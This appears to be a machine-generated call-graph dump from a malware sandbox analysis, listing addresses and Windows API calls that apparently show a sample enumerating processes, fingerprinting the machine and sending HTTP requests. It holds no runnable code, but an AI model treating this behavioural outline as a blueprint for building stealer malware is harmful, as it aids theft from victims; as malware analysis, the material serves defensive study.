9230b2 74511->74512 74513 9247e8 3 API calls 74512->74513 74514 9230c9 74513->74514 74515 9247e8 3 API calls 74514->74515 74516 9230df 74515->74516 74517 9247e8 3 API calls 74516->74517 74518 9230f6 74517->74518 74519 9247e8 3 API calls 74518->74519 74520 92310f 74519->74520 74521 9247e8 3 API calls 74520->74521 74522 923123 74521->74522 74523 9247e8 3 API calls 74522->74523 74524 92313a 74523->74524 74525 9247e8 3 API calls 74524->74525 74526 923154 74525->74526 74527 9247e8 3 API calls 74526->74527 74528 92316b 74527->74528 74529 9247e8 3 API calls 74528->74529 74530 923182 74529->74530 74531 9247e8 3 API calls 74530->74531 74532 923199 74531->74532 74533 9247e8 3 API calls 74532->74533 74534 9231af 74533->74534 74535 9247e8 3 API calls 74534->74535 74536 9231c5 74535->74536 74537 9247e8 3 API calls 74536->74537 74538 9231dc 74537->74538 74539 9247e8 3 API calls 74538->74539 74540 9231f2 74539->74540 74541 9247e8 3 API calls 74540->74541 74542 92320c 74541->74542 74543 9247e8 3 API calls 74542->74543 74544 923223 74543->74544 74545 9247e8 3 API calls 74544->74545 74546 92323a 74545->74546 74547 9247e8 3 API calls 74546->74547 74548 923250 74547->74548 74549 9247e8 3 API calls 74548->74549 74550 923267 74549->74550 74551 9247e8 3 API calls 74550->74551 74552 92327e 74551->74552 74553 9247e8 3 API calls 74552->74553 74554 923295 74553->74554 74555 9247e8 3 API calls 74554->74555 74556 9232ab 74555->74556 74557 9247e8 3 API calls 74556->74557 74558 9232c2 74557->74558 74559 9247e8 3 API calls 74558->74559 74560 9232d9 74559->74560 74561 9247e8 3 API calls 74560->74561 74562 9232f0 74561->74562 74563 9247e8 3 API calls 74562->74563 74564 923306 74563->74564 74565 9247e8 3 API calls 74564->74565 74566 92331c 74565->74566 74567 9247e8 3 API calls 74566->74567 74568 923333 74567->74568 74569 9247e8 3 API calls 74568->74569 74570 923349 74569->74570 74571 9247e8 3 API calls 74570->74571 74572 92335d 74571->74572 74573 9247e8 3 API calls 74572->74573 74574 923374 74573->74574 74575 9247e8 3 API calls 74574->74575 74576 92338a 74575->74576 74577 9247e8 3 API calls 74576->74577 74578 9233a1 74577->74578 74579 9247e8 3 API calls 74578->74579 74580 9233b8 74579->74580 74581 9247e8 3 API calls 74580->74581 74582 9233cf 74581->74582 74583 9247e8 3 API calls 74582->74583 74584 9233e6 74583->74584 74585 9247e8 3 API calls 74584->74585 74586 9233fd 74585->74586 74587 9247e8 3 API calls 74586->74587 74588 923414 74587->74588 74589 9247e8 3 API calls 74588->74589 74590 92342e 74589->74590 74591 9247e8 3 API calls 74590->74591 74592 923445 74591->74592 74593 9247e8 3 API calls 74592->74593 74594 92345c 74593->74594 74595 9247e8 3 API calls 74594->74595 74596 923473 74595->74596 74597 9247e8 3 API calls 74596->74597 74598 92348a 74597->74598 74599 9247e8 3 API calls 74598->74599 74600 9234a1 74599->74600 74601 9247e8 3 API calls 74600->74601 74602 9234b8 74601->74602 74603 9247e8 3 API calls 74602->74603 74604 9234cf 74603->74604 74605 9247e8 3 API calls 74604->74605 74606 9234e9 74605->74606 74607 9247e8 3 API calls 74606->74607 74608 923500 74607->74608 74609 9247e8 3 API calls 74608->74609 74610 923517 74609->74610 74611 9247e8 3 API calls 74610->74611 74612 92352e 74611->74612 74613 9247e8 3 API calls 74612->74613 74614 923545 74613->74614 74615 9247e8 3 API calls 74614->74615 74616 92355c 74615->74616 74617 9247e8 3 API calls 74616->74617 74618 923573 74617->74618 74619 9247e8 3 API calls 74618->74619 74620 92358a 74619->74620 74621 9247e8 3 API calls 74620->74621 74622 9235a4 74621->74622 74623 9247e8 3 API calls 74622->74623 74624 9235bb 74623->74624 74625 9247e8 3 API calls 74624->74625 74626 9235d2 74625->74626 74627 9247e8 3 API calls 74626->74627 74628 9235e9 74627->74628 74629 9247e8 3 API calls 74628->74629 74630 923600 74629->74630 74631 9247e8 3 API calls 74630->74631 74632 923617 74631->74632 74633 9247e8 3 API calls 74632->74633 74634 92362d 74633->74634 74635 9247e8 3 API calls 74634->74635 74636 923643 74635->74636 74637 9247e8 3 API calls 74636->74637 74638 92365d 74637->74638 74639 9247e8 3 API calls 74638->74639 74640 923674 74639->74640 74641 9247e8 3 API calls 74640->74641 74642 92368b 74641->74642 74643 9247e8 3 API calls 74642->74643 74644 9236a1 74643->74644 74645 9247e8 3 API calls 74644->74645 74646 9236b8 74645->74646 74647 9247e8 3 API calls 74646->74647 74648 9236cf 74647->74648 74649 9247e8 3 API calls 74648->74649 74650 9236e3 74649->74650 74651 9247e8 3 API calls 74650->74651 74652 9236f9 74651->74652 74653 9247e8 3 API calls 74652->74653 74654 923713 74653->74654 74655 9247e8 3 API calls 74654->74655 74656 92372a 74655->74656 74657 9247e8 3 API calls 74656->74657 74658 923741 74657->74658 74659 9247e8 3 API calls 74658->74659 74660 923758 74659->74660 74661 9247e8 3 API calls 74660->74661 74662 92376f 74661->74662 74663 9247e8 3 API calls 74662->74663 74664 923786 74663->74664 74665 9247e8 3 API calls 74664->74665 74666 92379a 74665->74666 74667 9247e8 3 API calls 74666->74667 74668 9237b1 74667->74668 74669 9247e8 3 API calls 74668->74669 74670 9237cb 74669->74670 74671 9247e8 3 API calls 74670->74671 74672 9237e2 74671->74672 74673 9247e8 3 API calls 74672->74673 74674 9237f6 74673->74674 74675 9247e8 3 API calls 74674->74675 74676 92380a 74675->74676 74677 9247e8 3 API calls 74676->74677 74678 923821 74677->74678 74679 9247e8 3 API calls 74678->74679 74680 923838 74679->74680 74681 9247e8 3 API calls 74680->74681 74682 92384f 74681->74682 74683 9247e8 3 API calls 74682->74683 74684 923866 74683->74684 74685 9247e8 3 API calls 74684->74685 74686 923880 74685->74686 74687 9247e8 3 API calls 74686->74687 74688 923897 74687->74688 74689 9247e8 3 API calls 74688->74689 74690 9238ae 74689->74690 74691 9247e8 3 API calls 74690->74691 74692 9238c5 74691->74692 74693 9247e8 3 API calls 74692->74693 74694 9238db 74693->74694 74695 9247e8 3 API calls 74694->74695 74696 9238f2 74695->74696 74697 9247e8 3 API calls 74696->74697 74698 923906 74697->74698 74699 9247e8 3 API calls 74698->74699 74700 92391d 74699->74700 74701 9247e8 3 API calls 74700->74701 74702 923937 74701->74702 74703 9247e8 3 API calls 74702->74703 74704 92394e 74703->74704 74705 9247e8 3 API calls 74704->74705 74706 923965 74705->74706 74707 9247e8 3 API calls 74706->74707 74708 92397c 74707->74708 74709 9247e8 3 API calls 74708->74709 74710 923993 74709->74710 74711 9247e8 3 API calls 74710->74711 74712 9239aa 74711->74712 74713 9247e8 3 API calls 74712->74713 74714 9239c1 74713->74714 74715 9247e8 3 API calls 74714->74715 74716 9239d8 74715->74716 74717 9247e8 3 API calls 74716->74717 74718 9239f2 74717->74718 74719 9247e8 3 API calls 74718->74719 74720 923a09 74719->74720 74721 9247e8 3 API calls 74720->74721 74722 923a20 74721->74722 74723 9247e8 3 API calls 74722->74723 74724 923a37 74723->74724 74725 9247e8 3 API calls 74724->74725 74726 923a4e 74725->74726 74727 9247e8 3 API calls 74726->74727 74728 923a65 74727->74728 74729 9247e8 3 API calls 74728->74729 74730 923a7c 74729->74730 74731 9247e8 3 API calls 74730->74731 74732 923a90 74731->74732 74733 9247e8 3 API calls 74732->74733 74734 923aaa 74733->74734 74735 9247e8 3 API calls 74734->74735 74736 923ac1 74735->74736 74737 9247e8 3 API calls 74736->74737 74738 923ad7 74737->74738 74739 9247e8 3 API calls 74738->74739 74740 923aee 74739->74740 74741 9247e8 3 API calls 74740->74741 74742 923b05 74741->74742 74743 9247e8 3 API calls 74742->74743 74744 923b1c 74743->74744 74745 9247e8 3 API calls 74744->74745 74746 923b33 74745->74746 74747 9247e8 3 API calls 74746->74747 74748 923b4a 74747->74748 74749 9247e8 3 API calls 74748->74749 74750 923b61 74749->74750 74751 9247e8 3 API calls 74750->74751 74752 923b75 74751->74752 74753 9247e8 3 API calls 74752->74753 74754 923b8c 74753->74754 74755 9247e8 3 API calls 74754->74755 74756 923ba3 74755->74756 74757 9247e8 3 API calls 74756->74757 74758 923bba 74757->74758 74759 9247e8 3 API calls 74758->74759 74760 923bd1 74759->74760 74761 9247e8 3 API calls 74760->74761 74762 923be8 74761->74762 74763 9247e8 3 API calls 74762->74763 74764 923bff 74763->74764 74765 9247e8 3 API calls 74764->74765 74766 923c19 74765->74766 74767 9247e8 3 API calls 74766->74767 74768 923c30 74767->74768 74769 9247e8 3 API calls 74768->74769 74770 923c47 74769->74770 74771 9247e8 3 API calls 74770->74771 74772 923c5e 74771->74772 74773 9247e8 3 API calls 74772->74773 74774 923c75 74773->74774 74775 9247e8 3 API calls 74774->74775 74776 923c8c 74775->74776 74777 9247e8 3 API calls 74776->74777 74778 923ca3 74777->74778 74779 9247e8 3 API calls 74778->74779 74780 923cb7 74779->74780 74781 9247e8 3 API calls 74780->74781 74782 923cd1 74781->74782 74783 9247e8 3 API calls 74782->74783 74784 923ce8 74783->74784 74785 9247e8 3 API calls 74784->74785 74786 923cff 74785->74786 74787 9247e8 3 API calls 74786->74787 74788 923d16 74787->74788 74789 9247e8 3 API calls 74788->74789 74790 923d2c 74789->74790 74791 9247e8 3 API calls 74790->74791 74792 923d43 74791->74792 74793 9247e8 3 API calls 74792->74793 74794 923d57 74793->74794 74795 9247e8 3 API calls 74794->74795 74796 923d6e 74795->74796 74797 9247e8 3 API calls 74796->74797 74798 923d85 74797->74798 74799 9247e8 3 API calls 74798->74799 74800 923d9c 74799->74800 74801 9247e8 3 API calls 74800->74801 74802 923db3 74801->74802 74803 9247e8 3 API calls 74802->74803 74804 923dca 74803->74804 74805 9247e8 3 API calls 74804->74805 74806 923de1 74805->74806 74807 9247e8 3 API calls 74806->74807 74808 923df8 74807->74808 74809 9247e8 3 API calls 74808->74809 74810 923e0f 74809->74810 74811 9247e8 3 API calls 74810->74811 74812 923e26 74811->74812 74813 9247e8 3 API calls 74812->74813 74814 923e40 74813->74814 74815 9247e8 3 API calls 74814->74815 74816 923e57 74815->74816 74817 9247e8 3 API calls 74816->74817 74818 923e6e 74817->74818 74819 9247e8 3 API calls 74818->74819 74820 923e84 74819->74820 74821 9247e8 3 API calls 74820->74821 74822 923e9b 74821->74822 74823 9247e8 3 API calls 74822->74823 74824 923eb2 74823->74824 74825 9247e8 3 API calls 74824->74825 74826 923ec9 74825->74826 74827 9247e8 3 API calls 74826->74827 74828 923ee0 74827->74828 74829 9247e8 3 API calls 74828->74829 74830 923efa 74829->74830 74831 9247e8 3 API calls 74830->74831 74832 923f10 74831->74832 74833 9247e8 3 API calls 74832->74833 74834 923f27 74833->74834 74835 9247e8 3 API calls 74834->74835 74836 923f3e 74835->74836 74837 9247e8 3 API calls 74836->74837 74838 923f55 74837->74838 74839 9247e8 3 API calls 74838->74839 74840 923f6c 74839->74840 74841 9247e8 3 API calls 74840->74841 74842 923f80 74841->74842 74843 9247e8 3 API calls 74842->74843 74844 923f97 74843->74844 74845 9247e8 3 API calls 74844->74845 74846 923fb1 74845->74846 74847 9247e8 3 API calls 74846->74847 74848 923fc7 74847->74848 74849 9247e8 3 API calls 74848->74849 74850 923fde 74849->74850 74851 9247e8 3 API calls 74850->74851 74852 923ff2 74851->74852 74853 9247e8 3 API calls 74852->74853 74854 924009 74853->74854 74855 9247e8 3 API calls 74854->74855 74856 924020 74855->74856 74857 9247e8 3 API calls 74856->74857 74858 924037 74857->74858 74859 9247e8 3 API calls 74858->74859 74860 92404e 74859->74860 74861 9247e8 3 API calls 74860->74861 74862 924067 74861->74862 74863 9247e8 3 API calls 74862->74863 74864 92407e 74863->74864 74865 9247e8 3 API calls 74864->74865 74866 924094 74865->74866 74867 9247e8 3 API calls 74866->74867 74868 9240a8 74867->74868 74869 9247e8 3 API calls 74868->74869 74870 9240bf 74869->74870 74871 9247e8 3 API calls 74870->74871 74872 9240d6 74871->74872 74873 9247e8 3 API calls 74872->74873 74874 9240ed 74873->74874 74875 9247e8 3 API calls 74874->74875 74876 924104 74875->74876 74877 9247e8 3 API calls 74876->74877 74878 92411e 74877->74878 74879 9247e8 3 API calls 74878->74879 74880 924135 74879->74880 74881 9247e8 3 API calls 74880->74881 74882 92414c 74881->74882 74883 9247e8 3 API calls 74882->74883 74884 924163 74883->74884 74885 9247e8 3 API calls 74884->74885 74886 924179 74885->74886 74887 9247e8 3 API calls 74886->74887 74888 92418d 74887->74888 74889 9247e8 3 API calls 74888->74889 74890 9241a1 74889->74890 74891 9247e8 3 API calls 74890->74891 74892 9241b8 74891->74892 74893 9247e8 3 API calls 74892->74893 74894 9241d2 74893->74894 74895 9247e8 3 API calls 74894->74895 74896 9241e8 74895->74896 74897 9247e8 3 API calls 74896->74897 74898 9241ff 74897->74898 74899 9247e8 3 API calls 74898->74899 74900 924216 74899->74900 74901 9247e8 3 API calls 74900->74901 74902 92422d 74901->74902 74903 9247e8 3 API calls 74902->74903 74904 924244 74903->74904 74905 9247e8 3 API calls 74904->74905 74906 924258 74905->74906 74907 9247e8 3 API calls 74906->74907 74908 92426e 74907->74908 74909 9247e8 3 API calls 74908->74909 74910 924288 74909->74910 74911 9247e8 3 API calls 74910->74911 74912 92429f 74911->74912 74913 9247e8 3 API calls 74912->74913 74914 9242b6 74913->74914 74915 9247e8 3 API calls 74914->74915 74916 9242cc 74915->74916 74917 9247e8 3 API calls 74916->74917 74918 9242e3 74917->74918 74919 9247e8 3 API calls 74918->74919 74920 9242fa 74919->74920 74921 9247e8 3 API calls 74920->74921 74922 924311 74921->74922 74923 9247e8 3 API calls 74922->74923 74924 924325 74923->74924 74925 9247e8 3 API calls 74924->74925 74926 92433c 74925->74926 74927 9247e8 3 API calls 74926->74927 74928 924353 74927->74928 74929 9247e8 3 API calls 74928->74929 74930 92436a 74929->74930 74931 9247e8 3 API calls 74930->74931 74932 924381 74931->74932 74933 9247e8 3 API calls 74932->74933 74934 924395 74933->74934 74935 9247e8 3 API calls 74934->74935 74936 9243ac 74935->74936 74937 9247e8 3 API calls 74936->74937 74938 9243c3 74937->74938 74939 9247e8 3 API calls 74938->74939 74940 9243da 74939->74940 74941 9247e8 3 API calls 74940->74941 74942 9243f1 74941->74942 74943 9247e8 3 API calls 74942->74943 74944 924408 74943->74944 74945 9247e8 3 API calls 74944->74945 74946 92441c 74945->74946 74947 9247e8 3 API calls 74946->74947 74948 924433 74947->74948 74949 9247e8 3 API calls 74948->74949 74950 92444a 74949->74950 74951 9247e8 3 API calls 74950->74951 74952 92445e 74951->74952 74953 9247e8 3 API calls 74952->74953 74954 924472 74953->74954 74955 9247e8 3 API calls 74954->74955 74956 924486 74955->74956 74957 9247e8 3 API calls 74956->74957 74958 9244a0 74957->74958 74959 9247e8 3 API calls 74958->74959 74960 9244b7 74959->74960 74961 9247e8 3 API calls 74960->74961 74962 9244cd 74961->74962 74963 9247e8 3 API calls 74962->74963 74964 9244e4 74963->74964 74965 9247e8 3 API calls 74964->74965 74966 9244fa 74965->74966 74967 9247e8 3 API calls 74966->74967 74968 924511 74967->74968 74969 9247e8 3 API calls 74968->74969 74970 924528 74969->74970 74971 9247e8 3 API calls 74970->74971 74972 92453e 74971->74972 74973 9247e8 3 API calls 74972->74973 74974 924558 74973->74974 74975 9247e8 3 API calls 74974->74975 74976 92456f 74975->74976 74977 9247e8 3 API calls 74976->74977 74978 924586 74977->74978 74979 9247e8 3 API calls 74978->74979 74980 92459d 74979->74980 74981 9247e8 3 API calls 74980->74981 74982 9245b4 74981->74982 74983 9247e8 3 API calls 74982->74983 74984 9245cb 74983->74984 74985 9247e8 3 API calls 74984->74985 74986 9245e2 74985->74986 74987 9247e8 3 API calls 74986->74987 74988 9245f9 74987->74988 74989 9247e8 3 API calls 74988->74989 74990 924612 74989->74990 74991 9247e8 3 API calls 74990->74991 74992 924629 74991->74992 74993 9247e8 3 API calls 74992->74993 74994 924642 74993->74994 74995 9247e8 3 API calls 74994->74995 74996 924656 74995->74996 74997 9247e8 3 API calls 74996->74997 74998 92466d 74997->74998 74999 9247e8 3 API calls 74998->74999 75000 924684 74999->75000 75001 9247e8 3 API calls 75000->75001 75002 92469b 75001->75002 75003 9247e8 3 API calls 75002->75003 75004 9246b2 75003->75004 75005 9247e8 3 API calls 75004->75005 75006 9246cc 75005->75006 75007 9247e8 3 API calls 75006->75007 75008 9246e3 75007->75008 75009 9247e8 3 API calls 75008->75009 75010 9246f9 75009->75010 75011 9247e8 3 API calls 75010->75011 75012 924710 75011->75012 75013 9247e8 3 API calls 75012->75013 75014 924727 75013->75014 75015 9247e8 3 API calls 75014->75015 75016 92473d 75015->75016 75017 9247e8 3 API calls 75016->75017 75018 924754 75017->75018 75019 9247e8 3 API calls 75018->75019 75020 924768 75019->75020 75021 9247e8 3 API calls 75020->75021 75022 924781 75021->75022 75023 9247e8 3 API calls 75022->75023 75024 924797 75023->75024 75025 9247e8 3 API calls 75024->75025 75026 9247ae 75025->75026 75027 9247e8 3 API calls 75026->75027 75028 9247c5 75027->75028 75029 9247e8 3 API calls 75028->75029 75030 9247dc 75029->75030 75030->74038 76358 94f299 75031->76358 75033 932563 CreateToolhelp32Snapshot Process32First 75034 932597 Process32Next 75033->75034 75035 9325c4 CloseHandle 75033->75035 75034->75035 75036 9325a9 StrCmpCA 75034->75036 76359 94f2f5 75035->76359 75036->75034 75038 9325bb 75036->75038 75038->75034 75041 9304bc lstrcpyA 75040->75041 75042 931c3c 75041->75042 75043 9304bc lstrcpyA 75042->75043 75044 931c4a GetSystemTime 75043->75044 75045 931c66 75044->75045 75046 93d1a8 setSBUpLow 5 API calls 75045->75046 75047 931c9d 75046->75047 75047->74045 75050 9305b6 75048->75050 75049 9305da 75049->74060 75050->75049 75051 9305c8 lstrcpyA lstrcatA 75050->75051 75051->75049 75053 9304ee lstrcpyA 75052->75053 75054 921d07 75053->75054 75055 9304ee lstrcpyA 75054->75055 75056 921d12 75055->75056 75057 9304ee lstrcpyA 75056->75057 75058 921d1d 75057->75058 75059 9304ee lstrcpyA 75058->75059 75060 921d34 75059->75060 75061 9369f8 75060->75061 75062 93051e 2 API calls 75061->75062 75063 936a2e 75062->75063 75064 93051e 2 API calls 75063->75064 75065 936a3b 75064->75065 75066 93051e 2 API calls 75065->75066 75067 936a48 75066->75067 75068 9304bc lstrcpyA 75067->75068 75069 936a55 75068->75069 75070 9304bc lstrcpyA 75069->75070 75071 936a62 75070->75071 75072 9304bc lstrcpyA 75071->75072 75073 936a6f 75072->75073 75074 9304bc lstrcpyA 75073->75074 75075 936a7c 75074->75075 75076 9304bc lstrcpyA 75075->75076 75077 936a89 75076->75077 75078 9304bc lstrcpyA 75077->75078 75101 936a96 75078->75101 75081 936908 33 API calls 75081->75101 75082 930562 lstrcpyA 75082->75101 75083 936ada StrCmpCA 75084 936b33 StrCmpCA 75083->75084 75083->75101 75085 936e60 75084->75085 75084->75101 75088 930562 lstrcpyA 75085->75088 75089 936e6b 75088->75089 75092 9304bc lstrcpyA 75089->75092 75090 9304ee lstrcpyA 75090->75101 75093 936e78 75092->75093 75094 930562 lstrcpyA 75093->75094 75095 936db8 75094->75095 75096 9304bc lstrcpyA 75095->75096 75097 936e97 75096->75097 75098 930562 lstrcpyA 75097->75098 75100 936ea1 75098->75100 75099 936b93 StrCmpCA 75099->75101 75102 936bec StrCmpCA 75099->75102 76377 936f2e 75100->76377 75101->75081 75101->75082 75101->75083 75101->75084 75101->75090 75101->75099 75101->75102 75112 921cfd lstrcpyA 75101->75112 75114 936c4c StrCmpCA 75101->75114 75115 936ca5 StrCmpCA 75101->75115 75134 936880 28 API calls 75101->75134 76362 9229f8 75101->76362 76365 922a09 75101->76365 76368 922a2b 75101->76368 76371 922a3c 75101->76371 76374 922a4d 75101->76374 76384 922a1a lstrcpyA 75101->76384 76385 922a5e lstrcpyA 75101->76385 76386 922a6f lstrcpyA 75101->76386 76387 922a80 lstrcpyA 75101->76387 75102->75101 75103 936e2f 75102->75103 75106 930562 lstrcpyA 75103->75106 75108 936e3a 75106->75108 75110 9304bc lstrcpyA 75108->75110 75111 936e47 75110->75111 75113 930562 lstrcpyA 75111->75113 75112->75101 75113->75095 75114->75101 75114->75115 75116 936cbb StrCmpCA 75115->75116 75117 936dfe 75115->75117 75120 936dca 75116->75120 75149 936cd1 75116->75149 75119 930562 lstrcpyA 75117->75119 75121 936e09 75119->75121 75123 930562 lstrcpyA 75120->75123 75124 9304bc lstrcpyA 75121->75124 75125 936dd5 75123->75125 75126 936e16 75124->75126 75128 9304bc lstrcpyA 75125->75128 75130 930562 lstrcpyA 75126->75130 75131 936de2 75128->75131 75129 936eb4 75129->74072 75130->75095 75133 930562 lstrcpyA 75131->75133 75132 921cfd lstrcpyA 75132->75149 75133->75095 75134->75101 75136 936d1b StrCmpCA 75137 936d74 StrCmpCA 75136->75137 75136->75149 75138 936d96 75137->75138 75139 936d86 Sleep 75137->75139 75141 930562 lstrcpyA 75138->75141 75139->75101 75142 936da1 75141->75142 75144 9304bc lstrcpyA 75142->75144 75143 9304ee lstrcpyA 75143->75149 75145 936dae 75144->75145 75146 930562 lstrcpyA 75145->75146 75146->75095 75148 930562 lstrcpyA 75148->75149 75149->75132 75149->75136 75149->75137 75149->75143 75149->75148 76388 922ac4 lstrcpyA 75149->76388 76389 922ad5 lstrcpyA 75149->76389 76390 936908 75149->76390 76410 922ae6 lstrcpyA 75149->76410 76411 936880 75149->76411 75151 930562 lstrcpyA 75150->75151 75152 9383e3 75151->75152 75153 930562 lstrcpyA 75152->75153 75154 9383ee 75153->75154 75155 930562 lstrcpyA 75154->75155 75156 9383f9 75155->75156 75156->74076 75158 9304fe 75157->75158 75159 930513 75158->75159 75160 93050b lstrcpyA 75158->75160 75159->74088 75160->75159 75162 9309b4 75161->75162 75163 9309bb GetVolumeInformationA 75161->75163 75162->75163 75164 930a22 75163->75164 75164->75164 75165 930a37 GetProcessHeap HeapAlloc 75164->75165 75166 930a52 75165->75166 75167 930a61 wsprintfA lstrcatA 75165->75167 75168 9304bc lstrcpyA 75166->75168 76461 931659 GetCurrentHwProfileA 75167->76461 75170 930a5a 75168->75170 75173 93d1a8 setSBUpLow 5 API calls 75170->75173 75171 930a9c lstrlenA 76477 9323aa lstrcpyA malloc strncpy 75171->76477 75175 930b03 75173->75175 75174 930abf lstrcatA 75176 930ad6 75174->75176 75175->74115 75177 9304bc lstrcpyA 75176->75177 75178 930aed 75177->75178 75178->75170 75180 9304ee lstrcpyA 75179->75180 75181 924b59 75180->75181 75182 924ab6 5 API calls 75181->75182 75183 924b65 75182->75183 75184 9304bc lstrcpyA 75183->75184 75185 924b81 75184->75185 75186 9304bc lstrcpyA 75185->75186 75187 924b91 75186->75187 75188 9304bc lstrcpyA 75187->75188 75189 924ba1 75188->75189 75190 9304bc lstrcpyA 75189->75190 75191 924bb1 75190->75191 75192 9304bc lstrcpyA 75191->75192 75193 924bc1 InternetOpenA StrCmpCA 75192->75193 75194 924bf5 75193->75194 75195 925194 InternetCloseHandle 75194->75195 75196 931c1f 7 API calls 75194->75196 75206 9251e1 75195->75206 75197 924c15 75196->75197 75198 93059c 2 API calls 75197->75198 75199 924c28 75198->75199 75200 930562 lstrcpyA 75199->75200 75201 924c33 75200->75201 75202 9305de 3 API calls 75201->75202 75203 924c5f 75202->75203 75204 930562 lstrcpyA 75203->75204 75205 924c6a 75204->75205 75207 9305de 3 API calls 75205->75207 75208 93d1a8 setSBUpLow 5 API calls 75206->75208 75209 924c8b 75207->75209 75210 925235 75208->75210 75211 930562 lstrcpyA 75209->75211 75312 933a02 StrCmpCA 75210->75312 75212 924c96 75211->75212 75213 93059c 2 API calls 75212->75213 75214 924cb8 75213->75214 75215 930562 lstrcpyA 75214->75215 75216 924cc3 75215->75216 75217 9305de 3 API calls 75216->75217 75218 924ce4 75217->75218 75219 930562 lstrcpyA 75218->75219 75220 924cef 75219->75220 75221 9305de 3 API calls 75220->75221 75222 924d10 75221->75222 75223 930562 lstrcpyA 75222->75223 75224 924d1b 75223->75224 75225 9305de 3 API calls 75224->75225 75226 924d3d 75225->75226 75227 93059c 2 API calls 75226->75227 75228 924d48 75227->75228 75229 930562 lstrcpyA 75228->75229 75230 924d53 75229->75230 75231 924d69 InternetConnectA 75230->75231 75231->75195 75232 924d97 HttpOpenRequestA 75231->75232 75233 924dd7 75232->75233 75234 925188 InternetCloseHandle 75232->75234 75235 924dfb 75233->75235 75236 924ddf InternetSetOptionA 75233->75236 75234->75195 75237 9305de 3 API calls 75235->75237 75236->75235 75238 924e11 75237->75238 75239 930562 lstrcpyA 75238->75239 75240 924e1c 75239->75240 75241 93059c 2 API calls 75240->75241 75242 924e3e 75241->75242 75243 930562 lstrcpyA 75242->75243 75244 924e49 75243->75244 75245 9305de 3 API calls 75244->75245 75246 924e6a 75245->75246 75247 930562 lstrcpyA 75246->75247 75248 924e75 75247->75248 75249 9305de 3 API calls 75248->75249 75250 924e97 75249->75250 75251 930562 lstrcpyA 75250->75251 75252 924ea2 75251->75252 75253 9305de 3 API calls 75252->75253 75254 924ec3 75253->75254 75255 930562 lstrcpyA 75254->75255 75256 924ece 75255->75256 75257 9305de 3 API calls 75256->75257 75258 924eef 75257->75258 75259 930562 lstrcpyA 75258->75259 75260 924efa 75259->75260 75261 93059c 2 API calls 75260->75261 75262 924f19 75261->75262 75263 930562 lstrcpyA 75262->75263 75264 924f24 75263->75264 75265 9305de 3 API calls 75264->75265 75266 924f45 75265->75266 75267 930562 lstrcpyA 75266->75267 75268 924f50 75267->75268 75269 9305de 3 API calls 75268->75269 75270 924f71 75269->75270 75271 930562 lstrcpyA 75270->75271 75272 924f7c 75271->75272 75273 93059c 2 API calls 75272->75273 75274 924f9e 75273->75274 75275 930562 lstrcpyA 75274->75275 75276 924fa9 75275->75276 75277 9305de 3 API calls 75276->75277 75278 924fca 75277->75278 75279 930562 lstrcpyA 75278->75279 75280 924fd5 75279->75280 75281 9305de 3 API calls 75280->75281 75282 924ff7 75281->75282 75283 930562 lstrcpyA 75282->75283 75284 925002 75283->75284 75285 9305de 3 API calls 75284->75285 75286 925023 75285->75286 75287 930562 lstrcpyA 75286->75287 75288 92502e 75287->75288 75289 9305de 3 API calls 75288->75289 75290 92504f 75289->75290 75291 930562 lstrcpyA 75290->75291 75292 92505a 75291->75292 75293 93059c 2 API calls 75292->75293 75294 925079 75293->75294 75295 930562 lstrcpyA 75294->75295 75296 925084 75295->75296 75297 9304bc lstrcpyA 75296->75297 75298 92509f 75297->75298 75299 93059c 2 API calls 75298->75299 75300 9250b6 75299->75300 75301 93059c 2 API calls 75300->75301 75302 9250c7 75301->75302 75303 930562 lstrcpyA 75302->75303 75304 9250d2 75303->75304 75305 9250e8 lstrlenA lstrlenA HttpSendRequestA 75304->75305 75306 92515c InternetReadFile 75305->75306 75307 925176 InternetCloseHandle 75306->75307 75310 92511c 75306->75310 75308 922920 75307->75308 75308->75234 75309 9305de 3 API calls 75309->75310 75310->75306 75310->75307 75310->75309 75311 930562 lstrcpyA 75310->75311 75311->75310 75313 933a21 ExitProcess 75312->75313 75314 933a28 strtok_s 75312->75314 75315 933a44 75314->75315 75316 933b88 75314->75316 75317 933b6a strtok_s 75315->75317 75318 933a61 StrCmpCA 75315->75318 75319 933b56 StrCmpCA 75315->75319 75320 933ab5 StrCmpCA 75315->75320 75321 933af4 StrCmpCA 75315->75321 75322 933b34 StrCmpCA 75315->75322 75323 933a99 StrCmpCA 75315->75323 75324 933b09 StrCmpCA 75315->75324 75325 933adf StrCmpCA 75315->75325 75326 933b1e StrCmpCA 75315->75326 75327 933a7d StrCmpCA 75315->75327 75328 93051e 2 API calls 75315->75328 75316->74123 75317->75315 75317->75316 75318->75315 75318->75317 75319->75317 75320->75315 75320->75317 75321->75315 75321->75317 75322->75317 75323->75315 75323->75317 75324->75315 75324->75317 75325->75315 75325->75317 75326->75317 75327->75315 75327->75317 75328->75315 75330 9304ee lstrcpyA 75329->75330 75331 925f64 75330->75331 75332 924ab6 5 API calls 75331->75332 75333 925f70 75332->75333 75334 9304bc lstrcpyA 75333->75334 75335 925f8c 75334->75335 75336 9304bc lstrcpyA 75335->75336 75337 925f9c 75336->75337 75338 9304bc lstrcpyA 75337->75338 75339 925fac 75338->75339 75340 9304bc lstrcpyA 75339->75340 75341 925fbc 75340->75341 75342 9304bc lstrcpyA 75341->75342 75343 925fcc InternetOpenA StrCmpCA 75342->75343 75344 926000 75343->75344 75345 9266ff InternetCloseHandle 75344->75345 75346 931c1f 7 API calls 75344->75346 76483 928048 CryptStringToBinaryA 75345->76483 75349 926020 75346->75349 75350 93059c 2 API calls 75349->75350 75352 926033 75350->75352 75351 93051e 2 API calls 75354 926739 75351->75354 75353 930562 lstrcpyA 75352->75353 75358 92603e 75353->75358 75355 9305de 3 API calls 75354->75355 75356 926750 75355->75356 75357 930562 lstrcpyA 75356->75357 75361 92675b 75357->75361 75359 9305de 3 API calls 75358->75359 75360 92606a 75359->75360 75362 930562 lstrcpyA 75360->75362 75364 93d1a8 setSBUpLow 5 API calls 75361->75364 75363 926075 75362->75363 75365 9305de 3 API calls 75363->75365 75366 9267eb 75364->75366 75367 926096 75365->75367 75496 93347f strtok_s 75366->75496 75368 930562 lstrcpyA 75367->75368 75369 9260a1 75368->75369 75370 93059c 2 API calls 75369->75370 75371 9260c3 75370->75371 75372 930562 lstrcpyA 75371->75372 75373 9260ce 75372->75373 75374 9305de 3 API calls 75373->75374 75375 9260ef 75374->75375 75376 930562 lstrcpyA 75375->75376 75377 9260fa 75376->75377 75378 9305de 3 API calls 75377->75378 75379 92611b 75378->75379 75380 930562 lstrcpyA 75379->75380 75381 926126 75380->75381 75382 9305de 3 API calls 75381->75382 75383 926148 75382->75383 75384 93059c 2 API calls 75383->75384 75385 926153 75384->75385 75386 930562 